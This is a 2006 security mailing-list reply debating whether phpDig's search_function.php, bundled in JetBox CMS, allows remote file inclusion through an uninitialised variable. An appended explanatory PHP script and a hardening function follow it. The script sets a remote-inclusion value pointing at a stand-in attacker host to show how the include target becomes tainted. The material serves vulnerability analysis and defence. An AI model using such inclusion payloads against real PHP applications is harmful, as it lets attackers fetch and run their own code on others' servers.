Network Security Vuln-Dev

Re: JetBox cms (search_function.php) Remote File Include

Subject: Re: JetBox cms (search_function.php) Remote File Include
Date: Wed, 30 Aug 2006 20:39:25 +0200
Hi Steve,

Steven M. Christey wrote on Tue, 29 Aug 2006 19:57:13 -0400:

> Frank Reissner said:
> 
> >  //comments
> >  
> >  function phpdigSearch(){
> >  
> >  Line: 423 <?php include $relative_script_path.'/libs/htmlheader.php'
> >  ?>
> >  
> >  ...
> >  }
> 
> > Please explain us how that should be exploited.
> 
> While this statement appears to be in a function declaration, there
> would be nested "<?php" tags - a parse error, at least in my PHP 4.

I tested it with PHP 4.3.10 on Mac OS X with Apache
1.3.33 and the script does nothing. No parse error,
no results. Only a white page.

Local and remote file inclusion tests show no results,
either.

> So, this code is "live" within the script, somehow.

Maybe. I find it hard to read; some more tabs would
be a good thing. :-)

I put a few 'echo "Test ...";' lines in the code; the
one after the last } is the only one which is executed.
Bad test, I know, but a "quick & dirty" way to look at which
parts are executed and which are not.

> And, in fact, if we look at the surrounding context (at least for my
> copy of search_function.php), we have this:
> 
>        else {
>            $t_strings = array_merge($t_mstrings,$t_fstrings);
>            phpdigParseTemplate($template,$t_strings,$table_results);
>        }
>    }
>    
>    else {
>    ?>
>    <?php include $relative_script_path.'/libs/htmlheader.php' ?>
>    <head>
>    <title><?php print $title_message ?></title>
>    <?php include $relative_script_path.'/libs/htmlmetas.php' ?>
> 
> 
> Notice the "?>" in front of the include statement, which closes off
> the first bit of executable code.

I'm not sure about the definition of function definitions.
In a normal script it's possible to mix <?...?> PHP code
and HTML code, for example if there are many HTML tags which
otherwise would have to be echo'ed in PHP. Is this possible inside
a function definition? The PHP manual says nothing about
this (or I didn't find it :-) ).

> So, this looks like it could be exploitable using a direct request to
> search_function.php, since at the point of the include, the
> $relative_script_path variable is *not* initialized.

It looks somewhat like this, yes.

I tried it with no results, but failing tests are no reliable
proof of non-inclusion.

But I tend to the conclusion that the whole script is really only
one function definition.

> Finally - the original pathname suggested a possible third party
> module, and in fact, the affected file and referenced code matches
> that of phpDig 1.8.8, so this is probably a vulnerability in phpDig
> instead of Jetbox.

I took a quick look at phpDig 1.8.8.
The search_function.php is mostly the same; here we find
a comment:

// $relative_script_path set in search.php file

Tests (remote and local inclusion) show no effects. But as
above... no proof.

Regards
  Carsten

-- 
Dipl.-Inform. Carsten Eilers
IT Security and Data Protection

<http://www.ceilers-it.de>
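The include shape the two of them argue about, rebuilt on a throwaway script as an added illustration (this is not phpDig's or JetBox's code, and it makes no claim about how search_function.php is reached in either product). It shows that a function body may leave and re-enter PHP mode with "?> ... <?php" without a parse error, what the include target becomes when $relative_script_path is never set versus when a request parameter populates it the way register_globals did (emulated here with extract()), and a hardened variant that refuses URLs and paths outside the application directory. The file names and the attacker host are assumptions made for the example.

```php
<?php
// Added illustration, not phpDig or JetBox code. File names and the
// attacker host below are assumptions for the example.

error_reporting(E_ALL);

// Leaving PHP mode with "?>" and re-entering with "<?php" is legal inside a
// function body just as at top level: the markup between the tags becomes
// output only when the function is called. A file consisting of nothing but
// this definition emits nothing when requested directly.
function html_header($title) {
    ?>
    <head><title><?php echo htmlspecialchars($title); ?></title></head>
    <?php
}

// The include target as the quoted code builds it: prefix . fixed suffix.
function include_target($relative_script_path) {
    return $relative_script_path . '/libs/htmlheader.php';
}

// Hardened variant: accept only an existing file under $base. The scheme
// check rejects http://, ftp://, php://, data: and similar before realpath()
// is consulted (it also refuses Windows drive letters, acceptable on the Unix
// hosts discussed above); realpath() resolves ".." and symlinks so that the
// prefix comparison against $base is meaningful. Returns the canonical path
// or null when the candidate must not be included.
function safe_include_target($relative_script_path, $base) {
    $candidate = include_target($relative_script_path);
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $candidate)) {
        return null;
    }
    $real = realpath($candidate);
    $base = realpath($base);
    if ($real === false || $base === false) {
        return null;
    }
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// The header markup is emitted only now, on the call.
echo "called  : ";
html_header('phpDig');

// (a) Variable never set: PHP raises an E_NOTICE "Undefined variable" and
//     treats it as "", so the target degrades to an absolute local path
//     ('/libs/htmlheader.php'), not to anything remote.
echo "unset   : ", include_target($relative_script_path), "\n";

// (b) register_globals emulated with extract(): the request parameter becomes
//     $relative_script_path and the include target is attacker-chosen. With
//     allow_url_fopen=On, PHP 4 would fetch and execute such a target.
$_GET = array('relative_script_path' => 'http://attacker.example/x.txt?');
extract($_GET);
echo "tainted : ", include_target($relative_script_path), "\n";

// (c) Hardened: the URL is refused by the scheme check, and a path that does
//     not resolve to a file under this directory is refused by realpath()
//     and the prefix comparison; both calls therefore return null.
$base = dirname(__FILE__);
var_dump(safe_include_target($relative_script_path, $base));
var_dump(safe_include_target('/etc/../etc', $base));
```

Run it from the command line (php thisfile.php) rather than through Apache so the E_NOTICE from case (a) stays visible; the three output lines make the difference between an unset prefix and a tainted one obvious without including anything.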

